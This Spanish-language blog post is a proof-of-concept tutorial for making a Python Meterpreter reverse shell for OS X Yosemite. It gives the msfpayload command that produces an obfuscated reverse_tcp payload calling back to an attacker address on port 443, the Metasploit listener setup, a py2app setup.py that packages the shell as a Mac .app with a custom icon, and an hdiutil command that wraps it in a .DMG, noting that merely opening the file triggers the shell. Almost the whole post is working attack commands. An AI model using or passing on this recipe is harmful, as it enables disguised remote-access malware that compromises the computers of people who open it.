22/10/14

Python meterpreter Reverse shell OSX Yosemite

Esta es una PoC para obtener una shell inversa con python meterpreter para OSX Yosemite.

Crear shell inversa ofuscada en python meterpreter:

msfpayload python/meterpreter/reverse_tcp LPORT=443 LHOST=x.x.x.x R > shell.py

LISTENER:

msfconsole
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set lport 443
set lhost 0.0.0.0

Para poder hacer el .py a .app necesitamos tener instalado en py2app, podemos instalarlo asi:

pip install py2app

Creamos el Setup.py

"""
This is a setup.py script generated by py2applet

Usage:
    python setup.py py2app
"""

from setuptools import setup

APP = ['NOMBRE-shell.py']
DATA_FILES = []
OPTIONS = {'iconfile': 'NOMBRE-ICONO.icns',}

setup(
    app=APP,
    data_files=DATA_FILES,
    options={'py2app': OPTIONS},
    setup_requires=['py2app'],

)

Si tenemos un icono que deseemos poner recordar que para mac necesita estar en extensión .icns y dentro del mismo directorio que donde esta shell.py setup.py.

Creamos el .APP:

python setup.py py2app


Para empaquetarlo en .DMG:


hdiutil create NAME.dmg -srcfolder dist/Nombre-APP.app

-------------------------------------------------------------------------

Para probar el PoC podemos correr ya en OSX nuestra shell.py en terminal:

python shell.py

o

Solamente abriendo el .APP o bien el .DMG:











Publicadas por a la/s
Etiquetas: , , ,

No hay comentarios.:

Publicar un comentario

Suscribirse a: Comentarios de la entrada (Atom)